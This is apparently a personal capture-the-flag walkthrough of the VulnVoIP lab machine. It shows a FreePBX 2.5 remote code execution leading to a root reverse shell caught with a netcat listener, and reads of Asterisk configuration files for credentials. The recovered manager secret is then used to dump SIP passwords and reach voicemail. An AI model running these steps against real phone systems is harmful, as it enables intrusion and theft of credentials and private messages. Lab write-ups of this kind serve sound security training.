HackLAB: VulnVoIP Walkthru

I found this vulnhub challenge rather unique, mainly because it is a VoIP box waiting to be 0wned. You don't see many of these around, so I got down and dirty with the fun stuff :-)

My approach is slightly different than the other walkthrus as I did not use the SIPVicious toolset. Instead, I owned the box pretty fast after discovering it's vulnerable to a RCE condition. The exploit worked with very little modification to its original code.

In case anyone interested, you can download VulnVoIP VM here.

1. Nmap output: 

2.Browse to http://192.168.0.168/recordings/index.php indicates FreePBX ver 2.5. 

 
3. Download FreePBX exploit. 

4(a). Setup netcat listener to catch the shell:
 

# nc -nlvp 443
listening on [any] 443 ...

4(b). Modify the sploit for http instead of https, configure the rhost and lhost then execute it:

5. Catch the shell and spawn a proper TTY using python: 
listening on [any] 443 ...
connect to [192.168.0.182] from (UNKNOWN) [192.168.0.168] 50752
id
uid=0(root) gid=0(root)
python -c 'import pty;pty.spawn("/bin/bash")'
bash-3.2# id
id
uid=0(root) gid=0(root)
bash-3.2# 

6. Get the asterisk password using the spawned shell:

bash-3.2# cat /etc/asterisk/manager.conf
cat /etc/asterisk/manager.conf
;
; AMI - Asterisk Manager interface
;
; FreePBX needs this to be enabled. Note that if you enable it on a different IP, you need
; to assure that this can't be reached from un-authorized hosts with the ACL settings (permit/deny).
; Also, remember to configure non-default port or IP-addresses in amportal.conf.
; 
; The AMI connection is used both by the portal and the operator's panel in FreePBX.
;
; FreePBX assumes an AMI connection to localhost:5038 by default.
;
[general]
enabled = yes
port = 5038
bindaddr = 0.0.0.0

[admin]
secret = amp111
deny=
permit=0.0.0.0/0.0.0.0
read = system,call,log,verbose,command,agent,user,config,command,dtmf,reporting,cdr,dialplan,originate
write = system,call,log,verbose,command,agent,user,config,command,dtmf,reporting,cdr,dialplan,originate

#include manager_additional.conf
#include manager_custom.conf 
<--snip---snip-->

7. Login to the asterisk CLI using 'admin' with pass 'amp111': 

# telnet 192.168.0.168 5038
Trying 192.168.0.168...
Connected to 192.168.0.168.
Escape character is '^]'.
Asterisk Call Manager/1.1
ACTION: LOGIN
USERNAME: admin
SECRET: amp111
EVENTS: ON

Response: Success
Message: Authentication accepted
 
8. Enumerate the SIPs:

action: command
command: sip show users

Response: Follows
Privilege: Command
Username                   Secret           Accountcode      Def.Context      ACL  NAT       
100                                                          from-internal    Yes  Always    
101                        s3cur3                            from-internal    Yes  Always    
102                        letmein123                        from-internal    Yes  Always    
201                        secret123                         from-internal    Yes  Always    
200                        quit3s3curE123                    from-internal    Yes  Always    
2000                       password123                       from-internal    Yes  Always    
--END COMMAND--

9. Look for Voice mail:

action: VoicemailUsersList 

Response: Success
Message: Voicemail user list will follow

Event: VoicemailUserEntry
VMContext: default
VoiceMailbox: 2000
Fullname: Support
Email: 
Pager: 
ServerEmail: 
MailCommand: 
Language: 
TimeZone: 
Callback: 
Dialout: 
UniqueID: 
ExitContext: 
SayDurationMinimum: 2
SayEnvelope: No
SayCID: No
AttachMessage: No
AttachmentFormat: 
DeleteMessage: No
VolumeGain: 0.00
CanReview: Yes
CallOperator: Yes
MaxMessageCount: 100
MaxMessageLength: 0
NewMessageCount: 1

Event: VoicemailUserEntryComplete

10(a). Using any VoIP client, configure it for SIP: 2000@192.168.0.168 pass: password123 
10(b). Place a call to SIP 2000 and listen for voicemail! ;-) It's engaged! Of course because
I'm dialing my own no. Now, figure out how to retrieve my own voicemailbox.
11. A little googling about 'asterisk voicemail retrieval number', I found that it can be accessed by pressing *98. 
Later I found that you can actually press * too.

12. Voicemail box requires a password!!! Using the existing shell, I did a search in /etc/asterisk/voicemail.conf for it:

bash-3.2# pwd
pwd
/etc/asterisk
bash-3.2# ls voicemail*
ls voicemail*
voicemail.conf voicemail.conf.template
bash-3.2# cat voicemail.conf
cat voicemail.conf
[general]
#include vm_general.inc
#include vm_email.inc
[default]

2000 => 0000,Support,,,attach=no|saycid=no|envelope=no|delete=no
bash-3.2# 

13. Listen to voicemail to retrieve password 'securesupport123'! 
14. Mission accomplished, root dance! :-)